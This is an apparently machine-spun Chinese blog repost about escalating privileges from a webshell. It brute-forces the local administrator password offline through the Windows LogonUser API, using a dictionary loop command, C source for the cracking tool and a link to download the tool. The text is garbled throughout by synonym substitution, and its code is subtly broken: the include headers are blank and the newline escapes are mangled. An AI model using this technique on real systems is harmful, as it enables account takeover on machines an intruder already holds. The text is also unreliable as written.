webshell下的另类提权之3389暗码爆破 8090安适门户
在土司看到的由x0wolf颁布的一个提权新思路感受不错就保藏过来了。 操作 LogonUser API 模拟用户登陆 判断账号暗码登陆告成与否(就是本地爆破) 该种要领欠亨过网络 速度极快 低权限 (webshell下) 就可以运行 for /f %i in (10k_passwd.txt) do test.exe administrator %i 1w 字典几乎是几秒,错误谬误就是会孕育产生大量系统登陆日志。 脚本:
#include #include void help() { printf("by x0wolf && lostwolf n"); printf("runas user passn"); } int LoginCreateProcess(char* user,char* pass) { HANDLE hToken; STARTUPINFOA si; PROCESS_INFORMATION pi; ZeroMemory(&si, sizeof(si)); ZeroMemory(&pi, sizeof(pi)); si.cb = sizeof(si); if(0 == LogonUser(user, ".", pass, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &hToken)) { printf("Failed to call LogonUser FailedNum:%dn",GetLastError()); return 0; } else { printf("Login Sucessedn"); return 1; } } int main(int argc,char* argv[]) { if(argc!=3) { help(); exit(0); } if(argc==3) { LoginCreateProcess(argv[1],argv[2]); } }工具下载:https://pan.baidu.com/s/1sl54gUh
温馨提示: 本文由杰米博客推荐,转载请保留链接: https://www.jmwww.net/file/pc/12764.html